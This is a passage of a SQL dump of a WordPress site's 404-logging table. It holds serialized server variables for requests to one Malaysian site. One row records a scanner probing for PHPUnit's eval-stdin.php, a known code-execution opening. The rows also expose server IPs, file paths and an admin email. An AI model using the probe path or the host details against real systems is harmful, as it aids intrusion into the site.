56:\"/test/vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php\";s:92:\"REDIRECT_REDIRECT_REDIRECT_REDIRECT_REDIRECT_REDIRECT_REDIRECT_REDIRECT_REDIRECT_SSL_TLS_SNI\";s:14:\"bintara.com.my\";s:87:\"REDIRECT_REDIRECT_REDIRECT_REDIRECT_REDIRECT_REDIRECT_REDIRECT_REDIRECT_REDIRECT_STATUS\";s:3:\"200\";s:90:\"REDIRECT_REDIRECT_REDIRECT_REDIRECT_REDIRECT_REDIRECT_REDIRECT_REDIRECT_REDIRECT_UNIQUE_ID\";s:27:\"XYlkay-hSs4yT7zPcWf-7wAAABg\";s:82:\"REDIRECT_REDIRECT_REDIRECT_REDIRECT_REDIRECT_REDIRECT_REDIRECT_REDIRECT_SCRIPT_URI\";s:78:\"https://bintara.com.my/test/vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php\";s:82:\"REDIRECT_REDIRECT_REDIRECT_REDIRECT_REDIRECT_REDIRECT_REDIRECT_REDIRECT_SCRIPT_URL\";s:56:\"/test/vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php\";s:83:\"REDIRECT_REDIRECT_REDIRECT_REDIRECT_REDIRECT_REDIRECT_REDIRECT_REDIRECT_SSL_TLS_SNI\";s:14:\"bintara.com.my\";s:78:\"REDIRECT_REDIRECT_REDIRECT_REDIRECT_REDIRECT_REDIRECT_REDIRECT_REDIRECT_STATUS\";s:3:\"200\";s:81:\"REDIRECT_REDIRECT_REDIRECT_REDIRECT_REDIRECT_REDIRECT_REDIRECT_REDIRECT_UNIQUE_ID\";s:27:\"XYlkay-hSs4yT7zPcWf-7wAAABg\";s:73:\"REDIRECT_REDIRECT_REDIRECT_REDIRECT_REDIRECT_REDIRECT_REDIRECT_SCRIPT_URI\";s:78:\"https://bintara.com.my/test/vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php\";s:73:\"REDIRECT_REDIRECT_REDIRECT_REDIRECT_REDIRECT_REDIRECT_REDIRECT_SCRIPT_URL\";s:56:\"/test/vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php\";s:74:\"REDIRECT_REDIRECT_REDIRECT_REDIRECT_REDIRECT_REDIRECT_REDIRECT_SSL_TLS_SNI\";s:14:\"bintara.com.my\";s:69:\"REDIRECT_REDIRECT_REDIRECT_REDIRECT_REDIRECT_REDIRECT_REDIRECT_STATUS\";s:3:\"200\";s:72:\"REDIRECT_REDIRECT_REDIRECT_REDIRECT_REDIRECT_REDIRECT_REDIRECT_UNIQUE_ID\";s:27:\"XYlkay-hSs4yT7zPcWf-7wAAABg\";s:64:\"REDIRECT_REDIRECT_REDIRECT_REDIRECT_REDIRECT_REDIRECT_SCRIPT_URI\";s:78:\"https://bintara.com.my/test/vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php\";s:64:\"REDIRECT_REDIRECT_REDIRECT_REDIRECT_REDIRECT_REDIRECT_SCRIPT_URL\";s:56:\"/test/vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php\";s:65:\"REDIRECT_REDIRECT_REDIRECT_REDIRECT_REDIRECT_REDIRECT_SSL_TLS_SNI\";s:14:\"bintara.com.my\";s:60:\"REDIRECT_REDIRECT_REDIRECT_REDIRECT_REDIRECT_REDIRECT_STATUS\";s:3:\"200\";s:63:\"REDIRECT_REDIRECT_REDIRECT_REDIRECT_REDIRECT_REDIRECT_UNIQUE_ID\";s:27:\"XYlkay-hSs4yT7zPcWf-7wAAABg\";s:55:\"REDIRECT_REDIRECT_REDIRECT_REDIRECT_REDIRECT_SCRIPT_URI\";s:78:\"https://bintara.com.my/test/vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php\";s:55:\"REDIRECT_REDIRECT_REDIRECT_REDIRECT_REDIRECT_SCRIPT_URL\";s:56:\"/test/vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php\";s:56:\"REDIRECT_REDIRECT_REDIRECT_REDIRECT_REDIRECT_SSL_TLS_SNI\";s:14:\"bintara.com.my\";s:51:\"REDIRECT_REDIRECT_REDIRECT_REDIRECT_REDIRECT_STATUS\";s:3:\"200\";s:54:\"REDIRECT_REDIRECT_REDIRECT_REDIRECT_REDIRECT_UNIQUE_ID\";s:27:\"XYlkay-hSs4yT7zPcWf-7wAAABg\";s:46:\"REDIRECT_REDIRECT_REDIRECT_REDIRECT_SCRIPT_URI\";s:78:\"https://bintara.com.my/test/vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php\";s:46:\"REDIRECT_REDIRECT_REDIRECT_REDIRECT_SCRIPT_URL\";s:56:\"/test/vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php\";s:47:\"REDIRECT_REDIRECT_REDIRECT_REDIRECT_SSL_TLS_SNI\";s:14:\"bintara.com.my\";s:42:\"REDIRECT_REDIRECT_REDIRECT_REDIRECT_STATUS\";s:3:\"200\";s:45:\"REDIRECT_REDIRECT_REDIRECT_REDIRECT_UNIQUE_ID\";s:27:\"XYlkay-hSs4yT7zPcWf-7wAAABg\";s:37:\"REDIRECT_REDIRECT_REDIRECT_SCRIPT_URI\";s:78:\"https://bintara.com.my/test/vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php\";s:37:\"REDIRECT_REDIRECT_REDIRECT_SCRIPT_URL\";s:56:\"/test/vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php\";s:38:\"REDIRECT_REDIRECT_REDIRECT_SSL_TLS_SNI\";s:14:\"bintara.com.my\";s:33:\"REDIRECT_REDIRECT_REDIRECT_STATUS\";s:3:\"200\";s:36:\"REDIRECT_REDIRECT_REDIRECT_UNIQUE_ID\";s:27:\"XYlkay-hSs4yT7zPcWf-7wAAABg\";s:32:\"REDIRECT_REDIRECT_REQUEST_METHOD\";s:3:\"GET\";s:28:\"REDIRECT_REDIRECT_SCRIPT_URI\";s:78:\"https://bintara.com.my/test/vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php\";s:28:\"REDIRECT_REDIRECT_SCRIPT_URL\";s:56:\"/test/vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php\";s:29:\"REDIRECT_REDIRECT_SSL_TLS_SNI\";s:14:\"bintara.com.my\";s:24:\"REDIRECT_REDIRECT_STATUS\";s:3:\"404\";s:27:\"REDIRECT_REDIRECT_UNIQUE_ID\";s:27:\"XYlkay-hSs4yT7zPcWf-7wAAABg\";s:19:\"REDIRECT_SCRIPT_URI\";s:78:\"https://bintara.com.my/test/vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php\";s:19:\"REDIRECT_SCRIPT_URL\";s:56:\"/test/vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php\";s:20:\"REDIRECT_SSL_TLS_SNI\";s:14:\"bintara.com.my\";s:15:\"REDIRECT_STATUS\";s:3:\"404\";s:18:\"REDIRECT_UNIQUE_ID\";s:27:\"XYlkay-hSs4yT7zPcWf-7wAAABg\";s:12:\"REDIRECT_URL\";s:10:\"/404.shtml\";s:11:\"REMOTE_ADDR\";s:12:\"47.89.208.37\";s:11:\"REMOTE_PORT\";s:5:\"60119\";s:14:\"REQUEST_METHOD\";s:3:\"GET\";s:14:\"REQUEST_SCHEME\";s:5:\"https\";s:15:\"SCRIPT_FILENAME\";s:50:\"/home/norfaiz/public_html/bintara.com.my/index.php\";s:11:\"SCRIPT_NAME\";s:10:\"/index.php\";s:10:\"SCRIPT_URI\";s:78:\"https://bintara.com.my/test/vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php\";s:10:\"SCRIPT_URL\";s:56:\"/test/vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php\";s:11:\"SERVER_ADDR\";s:12:\"103.6.198.69\";s:12:\"SERVER_ADMIN\";s:31:\"webmaster@bintaramy.norfaiz.com\";s:11:\"SERVER_NAME\";s:14:\"bintara.com.my\";s:11:\"SERVER_PORT\";s:3:\"443\";s:15:\"SERVER_PROTOCOL\";s:8:\"HTTP/1.1\";s:16:\"SERVER_SIGNATURE\";s:0:\"\";s:11:\"SSL_TLS_SNI\";s:14:\"bintara.com.my\";s:2:\"TZ\";s:17:\"Asia/Kuala_Lumpur\";s:9:\"UNIQUE_ID\";s:27:\"XYlkay-hSs4yT7zPcWf-7wAAABg\";s:8:\"PHP_SELF\";s:10:\"/index.php\";s:18:\"REQUEST_TIME_FLOAT\";s:15:\"1569285228.6506\";s:12:\"REQUEST_TIME\";s:10:\"1569285228\";}}','notice','2019-09-24 00:33:50','2019-09-24 00:33:49',30809832,32619672,'https://bintara.com.my/test/vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php',1,0,'47.89.208.37'),(26949,0,'four_oh_four','found_404','a:1:{s:6:\"SERVER\";a:49:{s:15:\"SERVER_SOFTWARE\";s:6:\"Apache\";s:11:\"REQUEST_URI\";s:30:\"/AutoDiscover/autodiscover.xml\";s:14:\"CONTENT_LENGTH\";s:3:\"318\";s:12:\"CONTENT_TYPE\";s:23:\"text/xml; charset=utf-8\";s:21:\"CONTEXT_DOCUMENT_ROOT\";s:40:\"/home/norfaiz/public_html/bintara.com.my\";s:14:\"CONTEXT_PREFIX\";s:0:\"\";s:13:\"DOCUMENT_ROOT\";s:40:\"/home/norfaiz/public_html/bintara.com.my\";s:17:\"GATEWAY_INTERFACE\";s:7:\"CGI/1.1\";s:5:\"HTTPS\";s:2:\"on\";s:20:\"HTTP_ACCEPT_ENCODING\";s:4:\"gzip\";s:15:\"HTTP_CONNECTION\";s:10:\"Keep-Alive\";s:9:\"HTTP_HOST\";s:14:\"bintara.com.my\";s:15:\"HTTP_USER_AGENT\";s:72:\"Microsoft Office/16.0 (Windows NT 10.0; Microsoft Excel 16.0.11929; Pro)\";s:12:\"HTTP_X_HTTPS\";s:1:\"1\";s:25:\"HTTP_X_OFFICE_APPLICATION\";s:1:\"1\";s:27:\"HTTP_X_OFFICE_AUDIENCEGROUP\";s:8:\"Insiders\";s:27:\"HTTP_X_OFFICE_MAJOR_VERSION\";s:2:\"16\";s:22:\"HTTP_X_OFFICE_PLATFORM\";s:5:\"Win32\";s:23:\"HTTP_X_OFFICE_SESSIONID\";s:36:\"6880D1F4-B079-4489-BBCF-C9611E9693A6\";s:21:\"HTTP_X_OFFICE_VERSION\";s:10:\"16.0.11929\";s:4:\"PATH\";s:13:\"/bin:/usr/bin\";s:12:\"QUERY_STRING\";s:0:\"\";s:14:\"REDIRECT_HTTPS\";s:2:\"on\";s:19:\"REDIRECT_SCRIPT_URI\";s:52:\"https://bintara.com.my/AutoDiscover/autodiscover.xml\";s:19:\"REDIRECT_SCRIPT_URL\";s:30:\"/AutoDiscover/autodiscover.xml\";s:20:\"REDIRECT_SSL_TLS_SNI\";s:14:\"bintara.com.my\";s:15:\"REDIRECT_STATUS\";s:3:\"200\";s:18:\"REDIRECT_UNIQUE_ID\";s:27:\"XYrJ-CC9qkCozCNGajHHDwAAAUQ\";s:12:\"REDIRECT_URL\";s:30:\"/AutoDiscover/autodiscover.xml\";s:11:\"REMOTE_ADDR\";s:15:\"115.132.145.112\";s:11:\"REMOTE_PORT\";s:5:\"60716\";s:14:\"REQUEST_METHOD\";s:4:\"POST\";s:14:\"REQUEST_SCHEME\";s:5:\"https\";s:15:\"SCRIPT_FILENAME\";s:50:\"/home/norfaiz/public_html/bintara.com.my/index.php\";s:11:\"SCRIPT_NAME\";s:10:\"/index.php\";s:10:\"SCRIPT_URI\";s:52:\"https://bintara.com.my/AutoDiscover/autodiscover.xml\";s:10:\"SCRIPT_URL\";s:30:\"/AutoDiscover/autodiscover.xml\";s:11:\"SERVER_ADDR\";s:12:\"103.6.198.69\";s:12:\"SERVER_ADMIN\";s:31:\"webmaster@bintaramy.norfaiz.com\";s:11:\"SERVER_NAME\";s:14:\"bintara.com.my\";s:11:\"SERVER_PORT\";s:3:\"443\";s:15:\"SERVER_PROTOCOL\";s:8:\"HTTP/1.1\";s:16:\"SERVER_SIGNATURE\";s:0:\"\";s:11:\"SSL_TLS_SNI\";s:14:\"bintara.com.my\";s:2:\"TZ\";s:17:\"Asia/Kuala_Lumpur\";s:9:\"UNIQUE_ID\";s:27:\"XYrJ-CC9qkCozCNGajHHDwAAAUQ\";s:8:\"PHP_SELF\";s:10:\"/index.php\";s:18:\"REQUEST_TIME_FLOAT\";s:15:\"1569376764.7374\";s:12:\"REQUEST_TIME\";s:10:\"1569376764\";}}','notice','2019-09-25 01:59:26','2019-09-25 01:59:25',31091344,32903656,'https://bintara.com.my/AutoDiscover/autodiscover.xml',1,0,'115.132.145.112'),(26950,0,'four_oh_four','found_404','a:1:{s:6:\"SERVER\";a:49:{s:15:\"SERVER_SOFTWARE\";s:6:\"Apache\";s:11:\"REQUEST_URI\";s:30:\"/AutoDiscover/autodiscover.xml\";s:14:\"CONTENT_LENGTH\";s:3:\"317\";s:12:\"CONTENT_TYPE\";s:23:\"text/xml; charset=utf-8\";s:21:\"CONTEXT_DOCUMENT_ROOT\";s:40:\"/home/norfaiz/public_html/bintara.com.my\";s:14:\"CONTEXT_PREFIX\";s:0:\"\";s:13:\"DOCUMENT_ROOT\";s:40:\"/home/norfaiz/public_html/bintara.com.my\";s:17:\"GATEWAY_INTERFACE\";s:7:\"CGI/1.1\";s:5:\"HTTPS\";s:2:\"on\";s:20:\"HTTP_ACCEPT_ENCODING\";s:4:\"gzip\";s:15:\"HTTP_CONNECTION\";s:10:\"Keep-Alive\";s:9:\"HTTP_HOST\";s:14:\"bintara.com.my\";s:15:\"HTTP_USER_AGENT\";s:71:\"Microsoft Office/16.0 (Windows NT 10.0; Microsoft Word 16.0.11929; Pro)\";s:12:\"HTTP_X_HTTPS\";s:1:\"1\";s:25:\"HTTP_X_OFFICE_APPLICATION\";s:1:\"0\";s:27:\"HTTP_X_OFFICE_AUDIENCEGROUP\";s:8:\"Insiders\";s:27:\"HTTP_X_OFFICE_MAJOR_VERSION\";s:2:\"16\";s:22:\"HTTP_X_OFFICE_PLATFORM\";s:5:\"Win32\";s:23:\"HTTP_X_OFFICE_SESSIONID\";s:36:\"A5612B4C-B57C-4B67-BBF5-CCEB319A8607\";s:21:\"HTTP_X_OFFICE_VERSION\";s:10:\"16.0.11929\";s:4:\"PATH\";s:13:\"/bin:/usr/bin\";s:12:\"QUERY_STRING\";s:0:\"\";s:14:\"REDIRECT_HTTPS\";s:2:\"on\";s:19:\"REDIRECT_SCRIPT_URI\";s:52:\"https://bintara.com.my/AutoDiscover/autodiscover.xml\";s:19:\"REDIRECT_SCRIPT_URL\";s:30:\"/AutoDiscover/autodiscover.xml\";s:20:\"REDIRECT_SSL_TLS_SNI\";s:14:\"bintara.com.my\";s:15:\"REDIRECT_STATUS\";s:3:\"200\";s:18:\"REDIRECT_UNIQUE_ID\";s:27:\"XYrKTvTT-ZZc8Zptu2CG6QAAARc\";s:12:\"REDIRECT_URL\";s:30:\"/AutoDiscover/autodiscover.xml\";s:11:\"REMOTE_ADDR\";s:15:\"115.132.145.112\";s:11:\"REMOTE_PORT\";s:5:\"54638\";s:14:\"REQUEST_METHOD\";s:4:\"POST\";s:14:\"REQUEST_SCHEME\";s:5:\"https\";s:15:\"SCRIPT_FILENAME\";s:50:\"/home/norfaiz/public_html/bintara.com.my/index.php\";s:11:\"SCRIPT_NAME\";s:10:\"/index.php\";s:10:\"SCRIPT_URI\";s:52:\"https://bintara.com.my/AutoDiscover/autodiscover.xml\";s:10:\"SCRIPT_URL\";s:30:\"/AutoDiscover/autodiscover.xml\";s:11:\"SERVER_ADDR\";s:12:\"103.6.198.69\";s:12:\"SERVER_ADMIN\";s:31:\"webmaster@bintaramy.norfaiz.com\";s:11:\"SERVER_NAME\";s:14:\"bintara.com.my\";s:11:\"SERVER_PORT\";s:3:\"443\";s:15:\"SERVER_PROTOCOL\";s:8:\"HTTP/1.1\";s:16:\"SERVER_SIGNATURE\";s:0:\"\";s:11:\"SSL_TLS_SNI\";s:14:\"bintara.com.my\";s:2:\"TZ\";s:17:\"Asia/Kuala_Lumpur\";s:9:\"UNIQUE_ID\";s:27:\"XYrKTvTT-ZZc8Zptu2CG6QAAARc\";s:8:\"PHP_SELF\";s:10:\"/index.php\";s:18:\"REQUEST_TIME_FLOAT\";s:15:\"1569376846.3972\";s:12:\"REQUEST_TIME\";s:10:\"1569376846\";}}','notice','2019-09-25 02:00:48','2019-09-25 02:00:46',31088648,32904976,'https://bintara.com.my/AutoDiscover/autodiscover.xml',1,0,'115.132.145.112'),(26912,0,'four_oh_four','found_404','a:1:{s:6:\"SERVER\";a:44:{s:15:\"SERVER_SOFTWARE\";s:6:\"Apache\";s:11:\"REQUEST_URI\";s:20:\"/our-history/about1/\";s:21:\"CONTEXT_DOCUMENT_ROOT\";s:40:\"/home/norfaiz/public_html/bintara.com.my\";s:14:\"CONTEXT_PREFIX\";s:0:\"\";s:13:\"DOCUMENT_ROOT\";s:40:\"/home/norfaiz/public_html/bintara.com.my\";s:17:\"GATEWAY_INTERFACE\";s:7:\"CGI/1.1\";s:5:\"HTTPS\";s:2:\"on\";s:11:\"HTTP_ACCEPT\";s:63:\"text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8\";s:20:\"HTTP_ACCEPT_ENCODING\";s:13:\"gzip, deflate\";s:20:\"HTTP_ACCEPT_LANGUAGE\";s:14:\"en-US,en;q=0.5\";s:15:\"HTTP_CONNECTION\";s:10:\"Keep-Alive\";s:8:\"HTTP_DNT\";s:1:\"1\";s:9:\"HTTP_HOST\";s:14:\"bintara.com.my\";s:15:\"HTTP_USER_AGENT\";s:78:\"Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:62.0) Gecko/20100101 Firefox/62.0\";s:12:\"HTTP_X_HTTPS\";s:1:\"1\";s:4:\"PATH\";s:13:\"/bin:/usr/bin\";s:12:\"QUERY_STRING\";s:0:\"\";s:14:\"REDIRECT_HTTPS\";s:2:\"on\";s:19:\"REDIRECT_SCRIPT_URI\";s:42:\"https://bintara.com.my/our-history/about1/\";s:19:\"REDIRECT_SCRIPT_URL\";s:20:\"/our-history/about1/\";s:20:\"REDIRECT_SSL_TLS_SNI\";s:14:\"bintara.com.my\";s:15:\"REDIRECT_STATUS\";s:3:\"200\";s:18:\"REDIRECT_UNIQUE_ID\";s:27:\"XYoWN96TjIfvDQGV8EDq7wAAAQY\";s:12:\"REDIRECT_URL\";s:20:\"/our-history/about1/\";s:11:\"REMOTE_ADDR\";s:13:\"117.27.80.202\";s:11:\"REMOTE_PORT\";s:5:\"40350\";s:14:\"REQUEST_METHOD\";s:3:\"GET\";s:14:\"REQUEST_SCHEME\";s:5:\"https\";s:15:\"SCRIPT_FILENAME\";s:50:\"/home/norfaiz/public_html/bintara.com.my/index.php\";s:11:\"SCRIPT_NAME\";s:10:\"/index.php\";s:10:\"SCRIPT_URI\";s:42:\"https://bintara.com.my/our-history/about1/\";s:10:\"SCRIPT_URL\";s:20:\"/our-history/about1/\";s:11:\"SERVER_ADDR\";s:12:\"103.6.198.69\";s:12:\"SERVER_ADMIN\";s:31:\"webmaster@bintaramy.norfaiz.com\";s:11:\"SERVER_NAME\";s:14:\"bintara.com.my\";s:11:\"SERVER_PORT\";s:3:\"443\";s:15:\"SERVER_PROTOCOL\";s:8:\"HTTP/1.1\";s:16:\"SERVER_SIGNATURE\";s:0:\"\";s:11:\"SSL_TLS_SNI\";s:14:\"bintara.com.my\";s:2:\"TZ\";s:17:\"Asia/Kuala_Lumpur\";s:9:\"UNIQUE_ID\";s:27:\"XYoWN96TjIfvDQGV8EDq7wAAAQY\";s:8:\"PHP_SELF\";s:10:\"/index.php\";s:18:\"REQUEST_TIME_FLOAT\";s:15:\"1569330743.2181\";s:12:\"REQUEST_TIME\";s:10:\"1569330743\";}}','notice','2019-09-24 13:12:24','2019-09-24 13:12:23',30754536,32558696,'https://bintara.com.my/our-history/about1/',1,0,'117.27.80.202'),(26913,0,'four_oh_four','found_404','a:1:{s:6:\"SERVER\";a:41:{s:15:\"SERVER_SOFTWARE\";s:6:\"Apache\";s:11:\"REQUEST_URI\";s:20:\"/microsoftsolutions/\";s:21:\"CONTEXT_DOCUMENT_ROOT\";s:40:\"/home/norfaiz/public_html/bintara.com.my\";s:14:\"CONTEXT_PREFIX\";s:0:\"\";s:13:\"DOCUMENT_ROOT\";s:40:\"/home/norfaiz/public_html/bintara.com.my\";s:17:\"GATEWAY_INTERFACE\";s:7:\"CGI/1.1\";s:5:\"HTTPS\";s:2:\"on\";s:11:\"HTTP_ACCEPT\";s:3:\"*/*\";s:19:\"HTTP_ACCEPT_CHARSET\";s:36:\"utf-8;q=0.7,iso-8859-1;q=0.2,*;q=0.1\";s:9:\"HTTP_HOST\";s:14:\"bintara.com.my\";s:15:\"HTTP_USER_AGENT\";s:90:\"Mozilla/5.0 (compatible; DotBot/1.1; http://www.opensiteexplorer.org/dotbot, help@moz.com)\";s:12:\"HTTP_X_HTTPS\";s:1:\"1\";s:4:\"PATH\";s:13:\"/bin:/usr/bin\";s:12:\"QUERY_STRING\";s:0:\"\";s:14:\"REDIRECT_HTTPS\";s:2:\"on\";s:19:\"REDIRECT_SCRIPT_URI\";s:42:\"https://bintara.com.my/microsoftsolutions/\";s:19:\"REDIRECT_SCRIPT_URL\";s:20:\"/microsoftsolutions/\";s:20:\"REDIRECT_SSL_TLS_SNI\";s:14:\"bintara.com.my\";s:15:\"REDIRECT_STATUS\";s:3:\"200\";s:18:\"REDIRECT_UNIQUE_ID\";s:27:\"XYoy4DsZuynGEzmE1y15pgAAAAA\";s:12:\"REDIRECT_URL\";s:20:\"/microsoftsolutions/\";s:11:\"REMOTE_ADDR\";s:14:\"216.244.66.228\";s:11:\"REMOTE_PORT\";s:5:\"39774\";s:14:\"REQUEST_METHOD\";s:3:\"GET\";s:14:\"REQUEST_SCHEME\";s:5:\"https\";s:15:\"SCRIPT_FILENAME\";s:50:\"/home/norfaiz/public_html/bintara.com.my/index.php\";s:11:\"SCRIPT_NAME\";s:10:\"/index.php\";s:10:\"SCRIPT_URI\";s:42:\"https://bintara.com.my/microsoftsolutions/\";s:10:\"SCRIPT_URL\";s:20:\"/microsoftsolutions/\";s:11:\"SERVER_ADDR\";s:12:\"103.6.198.69\";s:12:\"SERVER_ADMIN\";s:31:\"webmaster@bintaramy.norfaiz.com\";s:11:\"SERVER_NAME\";s:14:\"bintara.com.my\";s:11:\"SERVER_PORT\";s:3:\"443\";s:15:\"SERVER_PROTOCOL\";s:8:\"HTTP/1.1\";s:16:\"SERVER_SIGNATURE\";s:0:\"\";s:11:\"SSL_TLS_SNI\";s:14:\"bintara.com.my\";s:2:\"TZ\";s:17:\"Asia/Kuala_Lumpur\";s:9:\"UNIQUE_ID\";s:27:\"XYoy4DsZuynGEzmE1y15pgAAAAA\";s:8:\"PHP_SELF\";s:10:\"/index.php\";s:18:\"REQUEST_TIME_FLOAT\";s:15:\"1569338080.2459\";s:12:\"REQUEST_TIME\";s:10:\"1569338080\";}}','notice','2019-09-24 15:14:41','2019-09-24 15:14:40',30754784,32571080,'https://bintara.com.my/microsoftsolutions/',1,0,'216.244.66.228'),(26911,0,'four_oh_four','found_404','a:1:{s:6:\"SERVER\";a:84:{s:15:\"SERVER_SOFTWARE\";s:6:\"Apache\";s:11:\"REQUEST_URI\";s:60:\"/wp-cron.php?doing_wp_cron=1569323308.9349830150604248046875\";s:14:\"CONTENT_LENGTH\";s:1:\"0\";s:12:\"CONTENT_TYPE\";s:33:\"application/x-www-form-urlencoded\";s:21:\"CONTEXT_DOCUMENT_ROOT\";s:40:\"/home/norfaiz/public_html/bintara.com.my\";s:14:\"CONTEXT_PREFIX\";s:0:\"\";s:13:\"DOCUMENT_ROOT\";s:40:\"/home/norfaiz/public_html/bintara.com.my\";s:17:\"GATEWAY_INTERFACE\";s:7:\"CGI/1.1\";s:5:\"HTTPS\";s:2:\"on\";s:11:\"HTTP_ACCEPT\";s:3:\"*/*\";s:20:\"HTTP_ACCEPT_ENCODING\";s:13:\"deflate, gzip\";s:15:\"HTTP_CONNECTION\";s:5:\"close\";s:9:\"HTTP_HOST\";s:14:\"bintara.com.my\";s:12:\"HTTP_REFERER\";s:82:\"https://bintara.com.my/wp-cron.php?doing_wp_cron=1569323308.9349830150604248046875\";s:15:\"HTTP_USER_AGENT\";s:39:\"WordPress/5.1.2; https://bintara.com.my\";s:12:\"HTTP_X_HTTPS\";s:1:\"1\";s:4:\"PATH\";s:13:\"/bin:/usr/bin\";s:12:\"QUERY_STRING\";s:0:\"\";s:14:\"REDIRECT_HTTPS\";s:2:\"on\";s:32:\"REDIRECT_REDIRECT_CONTENT_LENGTH\";s:1:\"0\";s:30:\"REDIRECT_REDIRECT_CONTENT_TYPE\";s:33:\"application/x-www-form-urlencoded\";s:39:\"REDIRECT_REDIRECT_CONTEXT_DOCUMENT_ROOT\";s:40:\"/home/norfaiz/public_html/bintara.com.my\";s:32:\"REDIRECT_REDIRECT_CONTEXT_PREFIX\";s:0:\"\";s:31:\"REDIRECT_REDIRECT_DOCUMENT_ROOT\";s:40:\"/home/norfaiz/public_html/bintara.com.my\";s:29:\"REDIRECT_REDIRECT_ERROR_NOTES\";s:54:\"Script timed out before returning headers: wp-cron.php\";s:35:\"REDIRECT_REDIRECT_GATEWAY_INTERFACE\";s:7:\"CGI/1.1\";s:23:\"REDIRECT_REDIRECT_HTTPS\";s:2:\"on\";s:29:\"REDIRECT_REDIRECT_HTTP_ACCEPT\";s:3:\"*/*\";s:38:\"REDIRECT_REDIRECT_HTTP_ACCEPT_ENCODING\";s:13:\"deflate, gzip\";s:33:\"REDIRECT_REDIRECT_HTTP_CONNECTION\";s:5:\"close\";s:27:\"REDIRECT_REDIRECT_HTTP_HOST\";s:14:\"bintara.com.my\";s:30:\"REDIRECT_REDIRECT_HTTP_REFERER\";s:82:\"https://bintara.com.my/wp-cron.php?doing_wp_cron=1569323308.9349830150604248046875\";s:33:\"REDIRECT_REDIRECT_HTTP_USER_AGENT\";s:39:\"WordPress/5.1.2; https://bintara.com.my\";s:30:\"REDIRECT_REDIRECT_HTTP_X_HTTPS\";s:1:\"1\";s:22:\"REDIRECT_REDIRECT_PATH\";s:180:\"/usr/local/jdk/bin:/usr/kerberos/sbin:/usr/kerberos/bin:/usr/local/sbin:/usr/local/bin:/sbin:/bin:/usr/sbin:/usr/bin:/usr/X11R6/bin:/usr/local/bin:/usr/X11R6/bin:/root/bin:/opt/bin\";s:30:\"REDIRECT_REDIRECT_QUERY_STRING\";s:47:\"doing_wp_cron=1569323308.9349830150604248046875\";s:29:\"REDIRECT_REDIRECT_REMOTE_ADDR\";s:12:\"103.6.198.69\";s:29:\"REDIRECT_REDIRECT_REMOTE_PORT\";s:5:\"39546\";s:32:\"REDIRECT_REDIRECT_REQUEST_METHOD\";s:4:\"POST\";s:32:\"REDIRECT_REDIRECT_REQUEST_SCHEME\";s:5:\"https\";s:29:\"REDIRECT_REDIRECT_REQUEST_URI\";s:60:\"/wp-cron.php?doing_wp_cron=1569323308.9349830150604248046875\";s:33:\"REDIRECT_REDIRECT_SCRIPT_FILENAME\";s:52:\"/home/norfaiz/public_html/bintara.com.my/wp-cron.php\";s:29:\"REDIRECT_REDIRECT_SCRIPT_NAME\";s:12:\"/wp-cron.php\";s:28:\"REDIRECT_REDIRECT_SCRIPT_URI\";s:34:\"https://bintara.com.my/wp-cron.php\";s:28:\"REDIRECT_REDIRECT_SCRIPT_URL\";s:12:\"/wp-cron.php\";s:29:\"REDIRECT_REDIRECT_SERVER_ADDR\";s:12:\"103.6.198.69\";s:30:\"REDIRECT_REDIRECT_SERVER_ADMIN\";s:31:\"webmaster@bintaramy.norfaiz.com\";s:29:\"REDIRECT_REDIRECT_SERVER_NAME\";s:14:\"bintara.com.my\";s:29:\"REDIRECT_REDIRECT_SERVER_PORT\";s:3:\"443\";s:33:\"REDIRECT_REDIRECT_SERVER_PROTOCOL\";s:8:\"HTTP/1.1\";s:34:\"REDIRECT_REDIRECT_SERVER_SIGNATURE\";s:0:\"\";s:33:\"REDIRECT_REDIRECT_SERVER_SOFTWARE\";s:6:\"Apache\";s:29:\"REDIRECT_REDIRECT_SSL_TLS_SNI\";s:14:\"bintara.com.my\";s:24:\"REDIRECT_REDIRECT_STATUS\";s:3:\"500\";s:29:\"REDIRECT_REDIRECT_SUPHP_GROUP\";s:7:\"norfaiz\";s:31:\"REDIRECT_REDIRECT_SUPHP_HANDLER\";s:28:\"application/x-httpd-ea-php56\";s:28:\"REDIRECT_REDIRECT_SUPHP_USER\";s:7:\"norfaiz\";s:27:\"REDIRECT_REDIRECT_UNIQUE_ID\";s:27:\"XYn5LMrlkXDIX@rVBbEHTQAAAFc\";s:19:\"REDIRECT_SCRIPT_URI\";s:34:\"https://bintara.com.my/wp-cron.php\";s:19:\"REDIRECT_SCRIPT_URL\";s:12:\"/wp-cron.php\";s:20:\"REDIRECT_SSL_TLS_SNI\";s:14:\"bintara.com.my\";s:15:\"REDIRECT_STATUS\";s:3:\"500\";s:18:\"REDIRECT_UNIQUE_ID\";s:27:\"XYn5LMrlkXDIX@rVBbEHTQAAAFc\";s:12:\"REDIRECT_URL\";s:10:\"/500.shtml\";s:11:\"REMOTE_ADDR\";s:12:\"103.6.198.69\";s:11:\"REMOTE_PORT\";s:5:\"39546\";s:14:\"REQUEST_METHOD\";s:3:\"GET\";s:14:\"REQUEST_SCHEME\";s:5:\"https\";s:15:\"SCRIPT_FILENAME\";s:50:\"/home/norfaiz/public_html/bintara.com.my/index.php\";s:11:\"SCRIPT_NAME\";s:10:\"/index.php\";s:10:\"SCRIPT_URI\";s:34:\"https://bintara.com.my/wp-cron.php\";s:10:\"SCRIPT_URL\";s:12:\"/wp-cron.php\";s:11:\"SERVER_ADDR\";s:12:\"103.6.198.69\"